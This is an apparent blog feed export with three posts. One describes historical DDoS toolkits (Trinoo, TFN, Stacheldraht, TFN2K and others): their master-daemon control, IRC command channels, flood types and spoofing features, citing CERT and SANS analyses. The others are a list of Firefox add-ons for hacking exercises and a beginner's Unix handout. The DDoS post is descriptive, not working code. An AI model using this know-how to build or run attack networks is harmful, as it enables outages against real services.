tag:blogger.com,1999:blog-72518438234948865022024-03-13T20:56:13.600-07:00Ethical Hacking and Penetration TestingTo Learn More About Ethical Hacking And IT Security,
The Making of New Generation Virus,Some Useful Windows,
Linux,Unix Tricks & Tips And Many More ThingUnknownnoreply@blogger.comBlogger16125truetag:blogger.com,1999:blog-7251843823494886502.post-73875139371354002792010-01-17T00:00:00.000-08:002010-01-17T00:00:13.243-08:00<b>DDOS ATTACKS & ATTACK TOOLS</b><br />
<br />
<b>1.1 General Description</b><br />
<br />
During the last few years, in their increasing effort to raise havoc, the world wide community of hackers (also known as "crackers") started developing attack platforms for lunching global Internet scale coordinated DDoS attacks.<br />
Most of these tools were designed using client-server (master and slave) architecture. The attack network consists of large quantities of attack daemons, small software agents, capable of receiving command and generating different kind of packets (usually simulating some sort of attack). Those daemons are centrally controlled by a single or few master applications, servers capable of generating the required attack commands thus controlling the attack and the targets.<br />
The attacker can use the server application to order the attack.<br />
<br />
<b>1.2 Command Distribution Methods</b><br />
<b>1.2.1 Peer to Peer Distribution</b><br />
<br />
In this architecture the master is aware (has knowledge) of all available daemons. Either through lists of infected intermediate hosts constructed and administrated by hackers which installed them or by "keep alive" messages sent by the daemons upon installation to a predefined location.<br />
When distributing an attack command the master connects all the required daemons by sending them command packets.<br />
<br />
<b>1.2.2 Broadcast or Multicast Distribution</b><br />
<br />
In this architecture the master uses some sort of broadcast mechanism to connect and distribute attack commands. <br />
Due to broadcast packets filtering done by edge and core routers the most popular method for broadcasting commands is using an application based protocol which provides multicast features, such as IRC protocol (used mainly for chat applications).<br />
In this case when the intermediate host connects to the Internet and becomes on line. The daemon connects to a predefined IRC channel. The attacker then can connect to the IRC channel using some sort of chat application and simply type the necessary commands. IRC protocol takes the commands and distributes it to all the connected daemons.<br />
<br />
<b>1.3 Frequently Used Attack Tools<br />
1.3.1 Trinoo</b><br />
<br />
This distributed attack tool is installed on intermediate host using a buffer overrun bug in the popular programs: "statd", "cmsd" and others. The daemon's code was compiled on Linux and Solaris operating systems. The daemons and masters are installed on root accounts privileges.<br />
The basic trinoo daemon is cable of generating a UDP packets attack. The following packets parameters are controllable: destination address, packets sizes, attack duration.<br />
The attack is generated against random UDP ports on the victim's host. The contents of the packets are randomly generated from the intermediary host memory, thus packets sent from a certain daemon will have the same payload but different daemons generate different payloads. The daemon is cable of attacking multiple targets at once.<br />
<br />
<b>1.3.2 TFN (Tribe Flood Network)</b><br />
<br />
TFN installation procedure is similar to that of Trinoo and is based on buffer overrun bug.<br />
These tools use the same master-daemon architecture, and are capable of launching ICMP floods, UDP floods, SYN attacks, Smurf attacks and a raw TCP packet generator. The daemon's source code was compiled on Linux and Solaris operating systems. The daemons and masters are installed on root accounts privileges.<br />
Commands used by TFN are over ICMP protocol packets using fixed packet length (17 bytes).<br />
<br />
<b>1.3.3 Stacheldraht ("barbed wire")</b><br />
<br />
Stacheldraht is a DDoS tool that started to appear in the late summer of 1999 and combines features of trinoo and TFN. The possible attacks generated by the daemons of this tool are similar to those of TFN, namely, ICMP flood, SYN flood, UDP flood, and SMURF attacks. It does not provide an on demand root TCP port (that TFN provides).<br />
Stacheldraht also provides some advanced features, such as encrypted attacker-master communication (which makes detection and overtaking of daemon-master communication harder) and automated daemons updates which enables changes of the attack network with no re-deployment of daemon or masters.<br />
Stacheldraht daemon is capable of producing ICMP, UDP and TCP-SYN packets of sizes up to 1024 bytes against multiple victim hosts. TCP-SYN packets are generated against random ports taken from selected range of port numbers.<br />
<br />
<b>1.3.4 Trinity</b><br />
<br />
Trinity is capable of launching several types of flooding attacks on a victim host, including UDP, fragmentation, SYN, RST, ACK, and other floods. Communication from the master to the daemon is accomplished via Internet Relay Chat (IRC) or AOL's ICQ. <br />
IRC attack daemon (including Trinity) will go online by connecting to a predefined IRC server and join a predefined IRC chat room. There it will await incoming commands. IRC chat relays are used in this matter to broadcast and distribute attack commands.<br />
The following attack parameters are controllable: packet size (possibly random), ports (possibly random). <br />
<br />
<b>1.3.5 TFN2K</b><br />
<br />
TFN2K is a complex variant of the original TFN with features designed specifically to make TFN2K traffic difficult to recognize and filter, remotely execute commands, hide the true source of the attack using IP address spoofing, and transport TFN2K traffic over multiple transport protocols including UDP, TCP, and ICMP. <br />
TFN2K attacks include flooding (as in TFN) and those designed to crash or introduce instabilities in systems by sending malformed or invalid packets, such as those found in the Teardrop and Land attacks.<br />
Commands sent between masters and daemons are sent using UDP, ICMP and TCP (or all three in random).<br />
TFN2K generated traffic includes the following signatures: TCP and UDP header checksum contains errors, TCP header length is zero.<br />
<br />
<b>1.3.6 Shaft</b><br />
<br />
A Shaft network looks conceptually similar to a trinoo. It provides the ability to generate TCP, UDP and ICMP (or all three combined) floods. <br />
The attacker may control the following parameters: packet sizes, attack type, duration of the attack, list of targeted victims.<br />
Shaft daemons also provide statistics on the attack (mainly packets generation rates) which enables the master to refine the list of targets.<br />
<br />
<b>1.3.7 MStream</b><br />
<br />
The mstream uses spoofed TCP packets with the ACK flag set to attack the target. Communication between masters and daemons is not encrypted and is performed through UDP packets, masters are controlled by TCP packets.<br />
MStream is in early stages of development, which means it can be used for generating a limited number of attacks. <br />
The following attack parameters are controllable: victims IP addresses, duration of the attack.<br />
<br />
<b>Bibliography</b><br />
<br />
1. The DoS Project's "trinoo" distributed denial of service attack tool, David Dittrich University of Washington - http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt <br />
2. CERT® Incident Note IN-99-07 - Distributed Denial of Service Tools http://www.cert.org/incident_notes/IN-99-07.html <br />
3. CERT® Advisory CA-1996-01 UDP Port Denial-of-Service Attack<br />
<br />
<b>Trinoo and TFN</b><br />
<br />
4. National Infrastructure Protection Center - TRINOO/Tribal Flood Net/tfn2k http://www.nipc.gov/warnings/alerts/1999/trinoo.htm <br />
5. SANS Institute - Distributed Denial of Service Attack Tools: trinoo and wintrinoo http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm <br />
6. Advanced Networking Management Lab (ANML), Distributed Denial of Service Attacks(DDoS) Resources - http://www.anml.iu.edu/ddos/tools.html <br />
7. ISS Security Alert, December 7, 1999, Denial of Service Attack using the trin00 and Tribe Flood Network programs - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?id=advise40 <br />
8. The "stacheldraht" distributed denial of service attack tool, David Dittrich, University of Washington - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt <br />
<br />
General attack tools exploits <br />
9. CERT® Incident Note IN-99-04 Similar Attacks Using Various RPC Services - http://www.cert.org/incident_notes/IN-99-04.html <br />
<br />
10. CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd - http://www.cert.org/advisories/CA-99-08-cmsd.html <br />
11. CA-99-05 - Vulnerability in statd exposes vulnerability in automountd - http://www.cert.org/advisories/CA-99-05-statd-automountd.html <br />
12. CA-98.11 - Vulnerability in ToolTalk RPC Service - http://www.cert.org/advisories/CA-98.11.tooltalk.html <br />
<br />
Trinity<br />
13. SANS Institute - "Trinity" Distributed Denil of Service Attack Tool, Michael Marchesseau - http://rr.sans.org/malicious/trinity.php <br />
14. CERT Incident Note IN-2000-08. "Chat Clients and Network Security." CERT. 21 June 2000 - http://www.cert.org/incident_notes/IN-2000-08.html <br />
15. X-Force. "Internet Security Systems Security Alert." Internet Security Systems. 05 September 2000 - http://xforce.iss.net/alerts/advise59.php <br />
TFN2K<br />
16. Axent releases a full TFN2K Analysis - http://www.securiteam.com/securitynews/5YP0G000FS.html <br />
Shaft<br />
17. Analyzing Distributed Denial Of Service Tools: The Shaft Case; Sven Dietrich – NASA Goddard Space Flight Center, Neil Long – Oxford University, David Dittrich – University of Washington - http://home.adelphi.edu/~spock/lisa2000-shaft.pdf <br />
18. SANS Institute - An Analysis of the "Shaft" Distributed Denial of Service Tool - http://www.sans.org/y2k/shaft.htm <br />
<br />
Mstream<br />
19. The "mstream" distributed denial of service attack tool, David Dittrich, University of Washington - http://staff.washington.edu/dittrich/misc/mstream.analysis.txt <br />
20. Nation Infrastructure Protection Center, ADVISORY 00-044 "MStream Distributed Denial of Service Tool" - http://www.nipc.gov/warnings/advisories/2000/00-044.htmUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-88216289728378906492010-01-12T22:16:00.001-08:002010-01-12T22:16:59.944-08:00Firefox Addon<b>Firefox Addon</b><br />
<br />
This will be a basic guide to some common and basic hacking tools. This is intended mainly for those who have no prior knowledge of such and aren't sure where to begin. With some tweaking and common sense, you should be able to apply these to some of the missions on this site. I use the Firefox web browser(also known simply as FF) due to it's collection of add-ons, and will be referencing it throughout this tutorial. It doesnt mean that some of the things mentioned in here cant be done with other browsers, you just may need to find another way of doing it. I will suggest downloading Firefox as well as the following add-ons/tools:<br />
Firefox:<br />
Click here for Firefox<br />
Go here and search for the add-ons but don't limit yourself to just these:<br />
https://addons.mozilla.org/en-US/firefox<br />
Web Developer<br />
Firebug<br />
RefControl<br />
Live HTTP headers<br />
Tamperdata<br />
user agent switcher<br />
FoxyProxy<br />
<br />
Get acquainted with these terms:<br />
Click for cookie info<br />
Click for cache Clearing.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-16461108288794653392010-01-12T22:01:00.000-08:002010-01-12T22:01:48.836-08:00Basic Unix Commands<b> Basic Unix Commands</b><br />
<br />
<br />
This is one of a series of handouts describing Solaris and Linux, the operating systems used on the Sun and other computers in the Rutgers University New Brunswick Division of Computer and Information Sciences. This handout contains a description of the most basic commands. It assumes that you know how to get to the system and to login. If you don't please see "Getting Started".<br />
<br />
<b>CONTENTS</b><br />
<br />
* Typing Commands<br />
o Delete<br />
o Summary of special characters <br />
* Setting things up<br />
* Files and Commands that Deal with Files<br />
o Common Commands Dealing with Files<br />
o Printing<br />
o Disk quotas<br />
o More about Directories and "cd"<br />
o More About Specifying Other Files Belonging to Other Users<br />
o Some Useful Details: Ownership and Privacy <br />
* The Shell<br />
o Job control <br />
* Using the Documentation and Help Facilities<br />
o Man Pages<br />
o Full Documentation <br />
* Editors: Creating and Changing Files<br />
o EMACS <br />
* Related documents <br />
<br />
Typing Commands<br />
You will talk to Unix using your terminal's keyboard. Unix talks to you through your terminal's CRT screen. Notice that the keyboard looks much like a standard typewriter. In particular, many keys are labelled as they are on a typewriter.<br />
<br />
There are a number of additional keys. Depending upon the type of terminal or workstation you are using, there may be "special function" keys above your keyboard, with labels like "F2", special keys to the left with labels like "L1" or "STOP", and special keys to the right with various special labels. More about them later.<br />
<br />
The most important additional key is the Control key. This is located to the left of the normal letters, and is labelled "Control" or "Ctrl". It acts like a shift key, in that you hold it down and then type something else. For example, if you hold down Control and hit a C, that's called Control-C. When characters are printed, an uparrow is normally used, so Control-C would be printed as ^C. In different documentation, you'll see it called ^C, Control-C, Ctrl-C, or even C-c. Control-C is an important character to know about, but you can use it to interrupt programs. Suppose you are testing a program and it gets into an infinite loop. If you type ^C, the program will be killed. (This assumes that the program is a fairly simple one, like most of those you will write for assignments. It is possible for programs to block ^C, or to redirect their control to someplace unexpected. It also assumes that you type ^C in the window where the program is running.)<br />
<br />
When you're typing a command, nothing will happen until you hit the "return" key. That gives you a chance to fix typos and look carefully at the command before you hit "return".<br />
<br />
Unix is "case sensitive". That is, there's a difference between upper and lower case characters. The command "ls" will list all files in your directory. If you try to type it as "LS", you'll get an error message. Some commands use upper-case letters in the name, e.g. "Mosaic". In this case, you must use the upper-case letter exactly as shown. More commonly, some command options use upper case. For example, the "ls" command has an option called "-R". It must be typed in upper case. If a sentence begins with a command name, we'll violate the rules of English, and give you the command name as it really is: "ls" is the most common Unix command. However a lot of manuals will stick with English rules: "Ls" is the most common Unix command. The command is still "ls". It won't work if you type it as "Ls".<br />
<br />
The same thing is true with file names. If you use both upper and lower case letters in a file name, you'll always have to type it that way. Some people use VeRy OdD CaPiTaLiZaTiOn in their file names. That's fine, but they'll have to remember to type the names that way all the time.<br />
<br />
Delete<br />
The most common key for fixing typos is "delete". This key deletes the most recent character you typed, and in most cases removes it from the screen. Unfortunately this key is the most complex, because there is confusion about which key and ASCII code should be used.<br />
<br />
Our computers are configured to use the ASCII DEL character (decimal 127) to delete. Most keyboards now are set up with a key called "Backspace", which generates a different code (ASCII BS, which is the same as ^H, decimal 8). Some of our software will recognize either key, but not all of it. Thus you will either want to adjust our software to accept a backspace, or make sure that your keyboard generates a delete. Here's some advice, depending upon the type of keyboard you use:<br />
<br />
Sun Workstations:<br />
The newer Sun workstations have backspace keys. There is a delete key, but it's to the right, in a place that you probably wouldn't want to use regularly. If this is your normal workstation, I recommend putting the following command into the file .xinitrc in your home directory:<br />
<br />
xmodmap -e "keysym BackSpace = Delete"<br />
<br />
Micros at home:<br />
PC keyboards generally have a backspace key, with delete being fairly convenient to get to. However most of the communications programs you would use from home have configuration options that let you set the backspace key to generate a delete. We recommend using that option. <br />
<br />
If for some reason you prefer using a backspace rather than a delete, you'll need to tell Unix to treat the backspace character as delete. To do this, put the following command into the file .cshrc in your home directory:<br />
<br />
stty erase "^h"<br />
<br />
The disadvantage of this is that the editor emacs does not work well with this setting. So we only recommend this if you use a different editor (e.g. vi).<br />
<br />
Summary of special characters<br />
^C and delete are the most important special characters. Here's a summary of all the ones you'll want to use as a beginner:<br />
<br />
^C<br />
kill the current process <br />
^D<br />
end of file <br />
^U<br />
kill the whole line <br />
^W<br />
kill the previous word <br />
delete<br />
kill the previous character <br />
<br />
There is one more character that we'll talk about later: ^Z. You should not use this unless you know about job control. It can get you into states that you won't know about to get out of.<br />
<br />
^D is the end of file character. It's not used very often. However sometimes a program will open the terminal as if it were a file. In this case, what you type will become input to the program. There needs to be some way to tell the program when you're finished giving it input. ^D is it. (It corresponds to ^Z in MS/DOS.)<br />
<br />
Setting things up<br />
In order to help you to tell Unix about yourself, we have created a command called "newuser". The first time you log in, this will be run for you.<br />
<br />
It does 3 things:<br />
<br />
* It sets things up so the system will ask you what terminal type you are using, if it doesn't already know. If this happens, you'll see the line<br />
<br />
Terminal type:<br />
<br />
when you log in. It's looking for a terminal model name. These days the name "vt100" will work most of the time. (Don't type the quotes.)<br />
* It will set things up so that you get the prompt "name> " instead of "% " when the system is waiting for a command -- where name is the name of the computer you're using. We recommend using the system name as a prompt so that you always know what system you are talking to. We do so much with networks around here that it is easy to forget. Also, the prompt will change to "topaz 2> " if you are talking to a subsidiary command parser. This will help you realize that you are in an unusual context.<br />
* It will run programs that ask you for various information. Much of this is personal information. This is used to help other people find you, so that they can send email to you, etc. Supplying this information is voluntary. On some systems you may also be asked for a default printer and printer bin number. <br />
<br />
This program creates some files for you, e.g. .cshrc and .login. You may want to adjust these files yourself. For help in doing so, see the handout "Tailoring Your Setup: .cshrc".<br />
Files and Commands that Deal with Files<br />
Most programs and data you use will be stored in "files". A file is an area of storage to which you assign a name. You can put anything you want into a file: a program, a set of data, or a paper you are writing. You usually decide what you want to call a file when you first create it and start putting data into it. However you can change the name later if you want to (with "mv").<br />
<br />
Each file has a name. Normally the person who creates the file chooses the name. Names are from 1 to 255 characters, normally letters, digits, and some special characters such as "." and "_". There is a naming convention that you will do well to follow. Although it is not strictly necessary, it will help the system programs to figure out what you are doing. Under this convention, file names have at most one "." in them. The part of the name after the "." is called the "extension". It is used to describe what sort of thing is in the file. For example, "prog.p" is probably a Pascal source program, since ".p" is the extension normally used for Pascal. Similarly "prog.o" is probably a relocatable binary file, produced by compiling prog.p. Normally executable programs are given names without dots at all.<br />
<br />
A collection of files belonging to a particular user, is called a "directory". The login procedure puts you in your own directory. When you refer to file names with no special qualification, you will get a file by that name in your directory. In order to refer to a file in another directory, you must specify the directory name in front of the file name. Directory names normally have "/"'s around them. For example, the file name "project.p" would be a file in your own directory. "/bin/rm" is a file in the directory "/bin". "/usr/ucb/mail" is a file in the directory "/usr/ucb". Normally you will be using files only in your own directory, except for systems programs that you run.<br />
<br />
Most commands let you specify more than one file at a time. For example, to remove files "x" and "y", you could say "rm x y". ("rm" is the "remove" command.) There is also a shorthand that makes it easier for you to specify several files. The characters "*" and "?" in a filename act as "wildcards". A filename that includes one of them is actually a pattern. It expands to include a list of all files that match the pattern. For example, "rm *.s" would remove all files whose name ends in ".s". That's because * matches any character or sequence of characters. There can be more than one * in a name. E.g. "*pro*" will match all files with "pro" somewhere in their name. Since * will match the null string, this includes names that begin or end with "pro". The character "?" is used less often. It match any one character. So "rm ?.s" matches only files whose names have exactly 3 characters, the last of which are ".s"<br />
<br />
In Unix, everything on the system is considered to be a file. The things that aren't really files are typically allocated pseudo-filenames in the directory "/dev". Thus your terminal is "/dev/tty", and the tape drive "/dev/mt0".<br />
<br />
Common Commands Dealing with Files<br />
Here are the most common commands that deal with files. Note that the following list does not show how to create or edit a file. This is done with an editor, which is the subject of a separate section.<br />
<br />
cp oldfile newfile<br />
CoPy a file <br />
diff file1 file2<br />
shows the DIFFerences between 2 files <br />
du<br />
shows the Disk Usage on the current directory. Note that Newer versions of Unix display usage in 512-byte units. Most users prefer to see Kbytes. To do that, use the command "du -k". If you want this all the time, put "alias du du -k" in .cshrc. <br />
grep string files<br />
search all the specified files for the specified string. (Actually, you can specify a fairly complicated search pattern, but you will have to do "man grep" for details on that.) <br />
lpr file<br />
print file on the Line Printer - Solaris <br />
ls<br />
LiSt all the files in your directory <br />
more file<br />
show a file on the terminal, stopping when the screen is full. Hit the space bar to get it to continue. (It is called "more" because when the screen is full, it says "more: " to tell you there is more to come.) This is the way that most people look at files. <br />
mv oldfile newname<br />
MoVe a file (i.e. give it a new name) <br />
rm files<br />
ReMove files <br />
<br />
In order to keep things simple, we have not shown you the options for most of the commands. You should use the "man" command to find out the details. However the "ls" and print commands are used so much that it is worth taking a bit of time to explain them in more detail.<br />
<br />
If you just type "ls", it will list all of the files in your directory.<br />
<br />
The first option you have is to give it a filename to look for. "ls *.p" will show you all files than end in ".p". "ls /bin/a*" will show you all files starting with "a" in directory /bin.<br />
<br />
So far all you will have seen are lists of filenames. It is also possible to ask "ls" to give you more information about a file. That's where the options come in. Options give extra details about how you want the command to be executed. Normally the options come right after the name of the command, with a hyphen in front of it. For example, "ls -l" will give you a "long-form" directory listing. For each file, this will show its size, creation date, owner, etc. If you wanted to see this information for all files ending in ".p", you would put the option before the file names, i.e. "ls -l *.p". If you want to specify more than one option, put all of the letters after the hyphen, e.g. "ls -lt" will give you a long-form listing, sorted by creation time. This is useful for reviewing the files you have created recently, since those will show up first. Here are the most common options for ls:<br />
<br />
-a<br />
all files [normally files starting . not shown] <br />
-l<br />
long form - give lots of information <br />
-t<br />
time-sorted - most recent first <br />
-R<br />
Recursively look into directories <br />
<br />
The "-a" option requires some explanation. Filenames starting with "." are for files that you don't normally want to see. These include .login and .logout, which list commands that get done automatically every time you log in or out, and files giving default options for various other programs. The designers of Unix figured you would want to set up these options and then forget about them. Thus a normal "ls" will not show files whose names start with ".". "ls -a" will show all files, including those that start with ".".<br />
<br />
Printing<br />
In order to print a file on a printer, you need to know two things: the name of the printer, and what kind of file you're printing. There are so many printers that we're not going to list them here. In general, you should find a printer near where you're working, and ask the staff what its name is. However you can only print if the printer is attached to the network and will accept printouts from Unix. The RUCS public facilities all have such printers. So do many departments. On our Suns, the command "printers" will list printers that are valid on your machine.<br />
<br />
Now for file type: Most files you deal with will be plain text files. These are files that you create or edit in a text editor such as emacs. You can print files like this without any special precautions. However when your file comes out of a program, you need to be a bit careful. If you want to see whether a file is printable, look at it using "more" or "emacs". If it looks normal in more, you can print it. You can also print Postscript files. They start with a line like this:<br />
<br />
%!PS-Adobe-2.0<br />
<br />
Many files can't be printed on a printer at all. For example, the output of a compiler is a binary executable file. It makes no sense to print it. It would come out as junk. In other cases, the file can be printed, but it requires a special program. The most common examples are the output of TeX or LaTeX, and graphics files such as .GIF files or files produced by the Island tools.<br />
<br />
In these cases, you need a program that understands the file and can convert it into printable output. At Rutgers, you normally want the printable output in a format called "Postscript". Postscript is a special language that can be used to describe graphics, special effects such as boldface or italics, etc. There are "filters" to convert just about everything conceivable into Postscript format.<br />
<br />
It used to be that we tried to do file conversion automatically as part of the print program. This has turned out to be a bad idea. If you look at the printer documentation, you'll find that options to do this are still around. However they don't always work well, and we will probably be removing some of them in the future. Now if you want to print something that needs conversion, we recommend that you run the converter program yourself. In many cases, the converter program can print the file automatically. The most command case is TeX and LaTeX (languages used for document processing). They produce output in a special format called DVI. We use a converter called "dvips" to convert this into Postscript.<br />
<br />
Once you know the printer name, and any conversions needed, you can issue the print command. If the file is plain text or it's already been converted to Postscript, you can issue a simple print command, e.g.<br />
<br />
lpr -P printer filename<br />
<br />
<br />
If your file needs conversion, there are two possibilities. Some of the converter programs will issue the print command for you. dvips is an example of this. So to print a DVI file you could use the command<br />
<br />
dvips -P printer filename<br />
<br />
In other cases, the converter is a "filter". This means that it puts the converted output to "standard out". Filters are designed to be stuck together with the print command using "|" (the "pipe" character). For example, "ras2ps" is a converter that takes a Sun rasterfile (which is produced by certain programs that make a copy of your screen) and produces Postscript on standard output. So to print a raster file, you would use<br />
<br />
ras2ps filename | lp -d printer<br />
<br />
The man page should tell you whether the program sends the file to the printer itself, puts the output into a file, or puts it to standard output. If the program sends the file to the printer itself, that's all you need. If it puts the output into a file, then you'll need to use lp or lpr to print the file. If it puts the output to standard output, then you'll need to use "| lp" or "| lpr" after the program.<br />
<br />
lp and lpr have many options. You should look at the man page to see what they are.<br />
<br />
Disk quotas<br />
In order to prevent one user from using hogging all the space, we have disk quotas on many of our systems. You are not allowed to use more space on a given file system than your. To find out what your quota is, type the command "quota -v". (Quota with no argument only prints something if you are over quota. It's suitable for use in .login.) Here is an example of what you will see:<br />
<br />
Disk quotas for hedrick (uid 103):<br />
Filesystem usage quota limit timeleft files quota limit<br />
/ug/u1 69 1 3500 7.0 days 0 0 0 <br />
/ug/u2 0 1000 5000 0 0 0 <br />
<br />
Filesystem:<br />
Files are stored in "file systems", for administrative convenience. Normally all your file will be in one file system, so you'll only see one line. However some users have two different places they can put files, on different file systems. <br />
Usage:<br />
is the amount of disk space you are using now, in KBytes (1024 bytes). It should be roughly the sum of the file sizes shown by "ls -l". However files are allocated in units of 2 KBytes, so there will be some rounding up. <br />
Quota:<br />
is the amount of disk space you are supposed to use. Whenever your current usage goes over this number, you will get a message such as "WARNING: disk quota (/ug/u1) exceeded". We realize that you often need more space than your quota temporarily, so this is just a warning. Your program will continue. <br />
Limit:<br />
is your absolute limit. If you go over that you will get a message like "DISK LIMIT REACHED (/ug/u1) - WRITE FAILED". Your program will probably blow up at this point. The limit is normally larger than the quota. <br />
Timeleft:<br />
will be explained below. <br />
<br />
The second set of numbers (starting with files) refers to a separate quota on the number of files you can create. We do not use this, so those quotas and limits will always be 0.<br />
<br />
In order to keep people honest, we have to make sure that you don't stay over your quota too much. The idea is that you are supposed to get your usage down to the quota when you log out. In login, this is checked. If you are over quota when you log in, you will get a warning message. It will say something like "Over disk quota on /ug/u1, remove 1K within 7.0 days". If you use the quota command, you will now see 7.0 days in the timeleft column. If you do not get within quota by that time, the system will conclude that you are a hopeless pig, and prevent you from creating any more files until you fix the problem. At that point, you will have to delete enough files to bring your usage down to the quota. You will then have to log out and log in again.<br />
<br />
There is a possible problem with quotas. Current usage refers to all files that you own. That is, all files that show your name in the owner column when you do "ls -l". You own every file that you created. You also own your own mail file. So if someone sends you a lot of mail, this can put you over your quota. Also, if you copy a file into someone else's directory, you still own it, and it is still counted against your quota. If you want to give someone else a file, you should let them copy it. Note that current usage also counts files that have not yet been closed. If a program is still running, it may be using disk space that does not show in an "ls -l" command.<br />
<br />
************ NOTE ***************<br />
<br />
The following sections give more details about files and about using commands. On your first reading, you may want to skip to Using the Documentation and Help Facilities.<br />
<br />
More about Directories and "cd"<br />
Every user has a "home directory". This is a directory that is associated with the user name. Normally it has the same name as the user name, although there may be another directory or two above it. For example, the user hedrick might have a home directory "/u2/hedrick".<br />
<br />
Most users end up with so many files that it is hard to keep track of them all. They end up wanting to create more directories. For example, they may have separate directories for each course they are working on. Normally these additional directories are put within the user's home directory. Thus if hedrick is taking courses 431 and 435, he might create directories /u2/hedrick/cs431 and /u2/hedrick/cs435.<br />
<br />
To create a directory, use the command "mkdir". For example, "mkdir /u2/hedrick/cs435". As with file names, you often will not bother to type out the entire directory name. If you are currently in /u2/hedrick, it would be easier to type just "mkdir cs435".<br />
<br />
At any moment you are always in some directory. In various documentation this is called your "current directory" or your "working directory". (To my embarrassment, some of our documentation calls it your "connected directory". This terminology is from TOPS-20, our previous operating system. It does not apply to Unix.) If you mention a file name but don't specify a directory, it refers to this current directory. That is, if you in "/u2/hedrick", then the filename "prog.p" means "/u2/hedrick/prog.p". You change current directories using the command "cd". The full form would involve naming the whole directory, e.g. "cd /u2/hedrick/cs431". As usual, you will often not bother to do this. For example, if you were already in /u2/hedrick, then "cd cs431" would change your directory to "/u2/hedrick/cs431".<br />
<br />
The "pwd" command prints the current directory, in case you have forgotten. (pwd stands for Print Working Directory.)<br />
<br />
Be sure you know where you are before you do mkdir. Otherwise you can have unintended effects. For example, suppose you were in /u2/hedrick/cs435 and you did "mkdir cs431". You would end up with /u2/hedrick/cs435/cs431. That's probably not what you intended. Of course if you want to be safe, you can use the full form: "mkdir /u2/hedrick/cs431".<br />
<br />
The abbreviation ".." means the directory above the current one. This can be handy for getting back up to your home directory. If you were in /u2/hedrick/cs431, then "cd .." would get you to /u2/hedrick. You can use .. with other things, e.g. "cd ../cs435" would take you up to /u2/hedrick and then back down to /u2/hedrick/cs435.<br />
<br />
The abbreviation "." means the current directory. This isn't normally needed, since this is the default. However a few commands require you to specify a directory names, and "." can be useful then.<br />
<br />
More About Specifying Other Files Belonging to Other Users<br />
It would be nice if the way to access Smith's files was always to give a file name starting with /smith. Unfortunately, things are not so pleasant. For efficiency reasons, Unix system managers do not generally put everything on the same file system. Thus you are likely to find two more levels of directory than you would expect. Typically users' directories have names like /ug/u1/smith and /grad/u2/jones. The top level directories represent separate file systems. These may be separate disk drives, or at least separate at least separate physical parts of the same disk drive. On most large Unix systems, there are at least 3 file systems: /, /usr, and at least one more file system for user directories. None of this matters particularly to you, except that it makes it harder for you to figure out where to look for a given user's files. For this reason, there is a special syntax: ~user. ~jones means the home directory for the user named "jones". It expands to /ug/u1/jones, /ug/u2/jones, or whereever jones may happen to be. So to refer to the file prog.p on hedrick's directory, you would type "~hedrick/prog.p".<br />
<br />
Some Useful Details: Ownership and Privacy<br />
Unix allows you to control who can access your files. If you don't do anything special, anyone on the system can read or execute any of your files. However you can do things to exercize more control over file access.<br />
<br />
You can control access at two levels: the individual file, or the whole directory. In order to get to one of your files, someone else must have the authorization to look in your directory. If he can't look in your directory, then nothing else matters. Once he can look into your directory, then each individual file has its own code to say what he can do. So you can lock out users from individual files by changing the file permissions. Or you can lock them out from the whole directory by changing the directory's permissions. (In some of our documentation, the term "protection" is used rather than "permission". The proper Unix term is "permission.")<br />
<br />
Some aspects of file protection depend upon "groups". A group is a set of users. It has a group id, which is a number, and a group name. The groups are set up by the system administrator. Normally they represent classes and research projects. So there is a group "cs431-a", which contains all students in Computer Science 431, section A. There is also a group "vlsi-design", which contains all users in the VLSI design project. One of the things you can do is to say that everyone in a certain group can access your files. If you find that you need a group that is not already defined, you should contact your system administrator, by sending email to the pseudo-user "help". The groups are listed in the file /etc/group.<br />
<br />
In order to provide you with maximum flexibility, Unix allows each file to have three attributes that affect who can access it.<br />
<br />
owner:<br />
this person can normally delete or modify the file, and can change its protection and the group that is associated with it. The owner is normally the user that created the file. This means that if someone else puts a file into your directory, he owns it! (As a special convenience, you can always delete a file that is in your directory, even if its permissions would not normally allow you to.) <br />
group:<br />
different files can have different groups associated with them. You would normally choose a group that you want to have more access to the file than the rest of the world. For example, you might decide that members of your research project should be able to change the file, and everybody else should just be able to read it. Then you would set the group to your project's group. If you don't specify a group, it defaults to the group associated with the directory. The owner can change a file to any group that he belongs to. <br />
mode:<br />
the mode is a number that controls who can do what. It has separate fields for the owner, the group, and others. Thus the owner could allow himself to change the file, members of his group to read it, an other to do nothing at all. Or any other combination... <br />
<br />
The commands "chown", "chgrp", and "chmod" are used to change the owner, group, and mode of a file. (However only a superuser can use chown.)<br />
<br />
Although the mode is actually a number, you normally look at it by using the "ls -l" command. It displays the mode in a form that looks like the first line below.<br />
<br />
-rwxr-x---<br />
xxx owner<br />
xxx group<br />
xxx others<br />
r read<br />
w write<br />
x execute (search for directory)<br />
<br />
There are three groups of three letters. The first group applies to the owner, the second to the group, and the third to all others. The letters mean read, write, and execute. So the code "-rwxr-x---" means that the owner can do anything; others in his group can read or execute the program, but not change it; and others can't do anything with it at all.<br />
<br />
As mentioned above, in order to be able to access one of your files, a user must have the appropriate permission in the file mode, but he must also have access to the directory itself. The protection bits have a slightly different meaning for directories. Read allows the user to read the directory as a file. In practice, this controls whether he can do wildcard operations such as listing all the files in the directory. Write controls whether he can do operations that involve changing the directory, i.e. create or remove files. Execute controls whether he can open existing files. If execute is missing, the user cannot open any file in the directory, even if the files themselves have permissions that would allow him to do so. If the execute bit is on, then the user can do operations on individual files according to their permissions.<br />
<br />
Typically directories are set up to have modes "-rwxr-xr-x", which means that the owner can do anything, and everyone else can access files according to their individual modes. The "r-x" allows other users to look into the directory and at the files in the directory. Because "w" is missing, the other users can't create new files in the directory. If you wanted to have a totally private directory, you would use "-rwx------". In this case, no one else could look at anything in it. If you wanted members of your group to be able to create files in your directory, you might use "-rwxrwxr-x".<br />
<br />
In Unix, file names and files are conceptually separate. It is perfectly possible to have two different names for the same file. In that case, there are simply two different directory entries that point to the same file. In order to avoid confusion, the term "i-node" is used to refer to the file as a physical entity. So we would say that a file with two names is an "i-node" having two directory entries that point to it. We refer to the connection between a directory entry and an i-node as a "link".<br />
<br />
